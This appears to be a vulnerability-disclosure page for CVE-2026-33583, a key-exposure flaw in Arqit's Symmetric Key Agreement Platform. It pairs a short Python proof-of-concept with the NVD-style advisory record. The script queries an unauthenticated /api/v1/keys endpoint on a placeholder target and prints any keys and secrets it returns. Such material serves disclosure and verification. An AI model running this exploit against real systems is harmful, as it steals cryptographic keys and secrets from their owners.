CVE-2026-33583

import requests # Target vulnerable endpoint (replace with actual target URL) target_url = "http://<TARGET_IP>/api/v1/keys" try: # Send unauthenticated HTTP GET request response = requests.get(target_url, timeout=10) if response.status_code == 200: print("[+] Vulnerability Confirmed!") print("[+] Response content (Keys/Secrets):") print(response.text) else: print(f"[-] Request failed with status code: {response.status_code}") except requests.exceptions.RequestException as e: print(f"[-] Error connecting to target: {e}")

{"cve": {"id": "CVE-2026-33583", "sourceIdentifier": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "published": "2026-05-13T19:17:06.873", "lastModified": "2026-05-14T17:07:07.030", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Exposure of the QKEY (used as \ninput into the ‘OTA-Quantum’ device registration process) and internal \nsystem keys via an unauthenticated and unencrypted HTTP GET method in the Arqit Symmetric Key Agreement Platform.\n\nThis issue affects Symmetric Key Agreement Platform: before 26.03."}], "metrics": {"cvssMetricV31": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N", "baseScore": 8.7, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.2, "impactScore": 5.8}]}, "weaknesses": [{"source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-749"}]}], "references": [{"url": "https://www.cvcn.gov.it/cvcn/cve/CVE-2026-33583", "source": "a6d3dc9e-0591-4a13-bce7-0f5b31ff6158"}]}}